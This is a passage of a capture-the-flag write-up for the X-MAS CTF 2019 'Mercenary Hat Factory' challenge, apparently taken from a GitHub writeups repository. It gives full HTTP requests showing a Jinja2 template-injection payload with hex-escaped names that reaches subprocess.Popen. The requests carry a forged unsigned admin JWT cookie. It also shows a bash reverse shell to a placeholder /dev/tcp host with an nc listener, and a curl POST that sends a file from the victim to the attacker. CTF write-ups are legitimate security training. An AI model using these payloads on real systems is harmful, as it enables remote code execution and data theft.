<class 'asn1crypto.core.Concat'>,
<class 'asn1crypto.core.BitString'>,
<class 'asn1crypto.algos._ForceNullParameters'>,
<class 'cryptography.utils._DeprecatedValue'>,
<class 'cryptography.utils._ModuleWithDeprecations'>,
<class 'cryptography.hazmat.backends.interfaces.CipherBackend'>,
<class 'cryptography.hazmat.backends.interfaces.HashBackend'>,
<class 'cryptography.hazmat.backends.interfaces.HMACBackend'>,
<class 'cryptography.hazmat.backends.interfaces.CMACBackend'>,
<class 'cryptography.hazmat.backends.interfaces.PBKDF2HMACBackend'>,
<class 'cryptography.hazmat.backends.interfaces.RSABackend'>,
<class 'cryptography.hazmat.backends.interfaces.DSABackend'>,
<class 'cryptography.hazmat.backends.interfaces.EllipticCurveBackend'>,
<class 'cryptography.hazmat.backends.interfaces.PEMSerializationBackend'>,
<class 'cryptography.hazmat.backends.interfaces.DERSerializationBackend'>,
<class 'cryptography.hazmat.backends.interfaces.X509Backend'>,
<class 'cryptography.hazmat.backends.interfaces.DHBackend'>,
<class 'cryptography.hazmat.backends.interfaces.ScryptBackend'>,
<class 'cryptography.hazmat.primitives.hashes.HashAlgorithm'>,
<class 'cryptography.hazmat.primitives.hashes.HashContext'>,
<class 'cryptography.hazmat.primitives.hashes.ExtendableOutputFunction'>,
<class 'cryptography.hazmat.primitives.hashes.Hash'>,
<class 'cryptography.hazmat.primitives.hashes.SHA1'>,
<class 'cryptography.hazmat.primitives.hashes.SHA512_224'>,
<class 'cryptography.hazmat.primitives.hashes.SHA512_256'>,
<class 'cryptography.hazmat.primitives.hashes.SHA224'>,
<class 'cryptography.hazmat.primitives.hashes.SHA256'>,
<class 'cryptography.hazmat.primitives.hashes.SHA384'>,
<class 'cryptography.hazmat.primitives.hashes.SHA512'>,
<class 'cryptography.hazmat.primitives.hashes.SHA3_224'>,
<class 'cryptography.hazmat.primitives.hashes.SHA3_256'>,
<class 'cryptography.hazmat.primitives.hashes.SHA3_384'>,
<class 'cryptography.hazmat.primitives.hashes.SHA3_512'>,
<class 'cryptography.hazmat.primitives.hashes.SHAKE128'>,
<class 'cryptography.hazmat.primitives.hashes.SHAKE256'>,
<class 'cryptography.hazmat.primitives.hashes.MD5'>,
<class 'cryptography.hazmat.primitives.hashes.BLAKE2b'>,
<class 'cryptography.hazmat.primitives.hashes.BLAKE2s'>,
<class 'cryptography.hazmat.primitives.asymmetric.utils.Prehashed'>,
<class 'cryptography.hazmat.primitives.serialization.base.KeySerializationEncryption'>,
<class 'cryptography.hazmat.primitives.serialization.base.BestAvailableEncryption'>,
<class 'cryptography.hazmat.primitives.serialization.base.NoEncryption'>,
<class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAParameters'>,
<class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPrivateKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPublicKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAParameterNumbers'>,
<class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPublicNumbers'>,
<class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPrivateNumbers'>,
<class 'cryptography.hazmat._oid.ObjectIdentifier'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurveOID'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurve'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurveSignatureAlgorithm'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePrivateKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePublicKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT571R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT409R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT283R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT233R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT163R2'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT571K1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT409K1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT283K1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT233K1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECT163K1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECP521R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECP384R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECP256R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECP256K1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECP224R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.SECP192R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.BrainpoolP256R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.BrainpoolP384R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.BrainpoolP512R1'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.ECDSA'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePublicNumbers'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePrivateNumbers'>,
<class 'cryptography.hazmat.primitives.asymmetric.ec.ECDH'>,
<class 'cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PublicKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPublicKey'>,
<class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateNumbers'>,
<class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPublicNumbers'>,
<class 'cryptography.hazmat.primitives.asymmetric.padding.AsymmetricPadding'>,
<class 'cryptography.hazmat.primitives.asymmetric.padding.PKCS1v15'>,
<class 'cryptography.hazmat.primitives.asymmetric.padding.PSS'>,
<class 'cryptography.hazmat.primitives.asymmetric.padding.OAEP'>,
<class 'cryptography.hazmat.primitives.asymmetric.padding.MGF1'>,
<class 'jwt.algorithms.Algorithm'>,
<class 'jwt.api_jws.PyJWS'>,
<class 'jinja2.ext.Extension'>,
<class 'jinja2.ext._CommentFinder'>,
<class 'jinja2.debug.TracebackFrameProxy'>,
<class 'jinja2.debug.ProcessedTraceback'>]
```

You can use the `__dir__()` method to enumerate all the methods that can be called from this result.

```
GET /makehat?hatName={{''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|last|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fdir\x5f\x5f')()}} HTTP/1.1
Host: challs.xmas.htsp.ro:11005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challs.xmas.htsp.ro:11005/register
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoiU2FudGEiLCJwYXNzIjoiTWtvMDlpam4ifQ.
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2019 10:00:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1385
Connection: close

<head>
<link rel="stylesheet" type="text/css" href="/static/css/styles.css">
</head>

<body>
<div class="navbar">
Home

Login
Register

</div>
<div class="container" style="text-align:center">

<h1>You are viewing:
<span>['__repr__', '__hash__', '__getattribute__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__iter__', '__init__', '__len__', '__getitem__', '__setitem__', '__delitem__', '__add__', '__mul__', '__rmul__', '__contains__', '__iadd__', '__imul__', '__new__', '__reversed__', '__sizeof__', 'clear', 'copy', 'append', 'insert', 'extend', 'pop', 'remove', 'index', 'count', 'reverse', 'sort', '__doc__', '__str__', '__setattr__', '__delattr__', '__reduce_ex__', '__reduce__', '__subclasshook__', '__init_subclass__', '__format__', '__dir__', '__class__']</span></h1>
</div>
</body>

<script src="/static/js/snow.js"></script>
```

There is an interesting `__getitem__()` method that can be used to retrieve the data from the list using the index but without using `[]`.

The `<class 'subprocess.Popen'>` class is at position number `215` and allow us to launch commands.

We can setup a server listening on port `1337` with `nc -lk 1337` and then encode a reverse shell that will be launched on the victim host in order to connect to our server.

```
/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/1337 0>&1"

\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x2e\x78\x2e\x78\x2e\x78\x2f\x31\x33\x33\x37\x20\x30\x3e\x26\x31\x22
```

The request will be the following.

```
GET /makehat?hatName={{''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|last|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(215)('\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x2e\x78\x2e\x78\x2e\x78\x2f\x31\x33\x33\x37\x20\x30\x3e\x26\x31\x22',shell=True)}} HTTP/1.1
Host: challs.xmas.htsp.ro:11005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challs.xmas.htsp.ro:11005/register
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoiU2FudGEiLCJwYXNzIjoiTWtvMDlpam4ifQ.
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

On the victim host an interesting file can be found: `unusual_flag.mp4`. It can be transferred like the following:
* on the attacker machine: `nc -l -p 8000 > unusual_flag.mp4`;
* on the victim machine: `curl -X POST --data-binary @unusual_flag.mp4 http://x.x.x.x:8000`.

At this point you have to remove the HTTP headers inserted into the created file by `nc` and then you can launch the MP4 video [unusual_flag.mp4](https://github.com/m3ssap0/CTF-Writeups/raw/master/X-MAS%20CTF%202019/Mercenary%20Hat%20Factory/unusual_flag.mp4).

Into the video there is the flag.

```
X-MAS{W3lc0m3_70_7h3_h4t_f4ct0ry__w3ve_g0t_unusu4l_h4ts_90d81c091da}
```

Original writeup (https://github.com/m3ssap0/CTF-Writeups/blob/master/X-MAS%20CTF%202019/Mercenary%20Hat%20Factory/README.md).